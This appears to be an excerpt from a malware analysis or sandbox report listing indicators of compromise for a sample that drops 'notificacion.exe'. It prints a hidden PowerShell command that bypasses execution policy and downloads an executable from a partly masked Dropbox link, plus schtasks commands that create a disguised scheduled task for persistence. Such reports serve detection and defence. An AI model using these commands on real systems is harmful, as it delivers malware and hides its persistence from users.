Technical Information
- '%APPDATA%\notificacion.exe'
- https://www.dr##box.com/s/fzr6e11pw485bg7/axelito.exe?dl##
- %APPDATA%\notificacion.exe
- 'dr##box.com':443
- 'uc#############04c898827a396.dl.dropboxusercontent.com':443
- DNS ASK dr##box.com
- DNS ASK uc#############04c898827a396.dl.dropboxusercontent.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Executionpolicy bypass -noprofile -windowstyle hidden -command "Set-Content -value (new-object System.net.webclient).downloaddata( 'https://www.dr##box.com/s/fzr6e11pw485bg7/axelito.exe?dl##...' (with hidden window)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\jxjlgI" /XML "%TEMP%\tmp7646.tmp"' (with hidden window)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\jxjlgI" /XML "%TEMP%\tmp7646.tmp"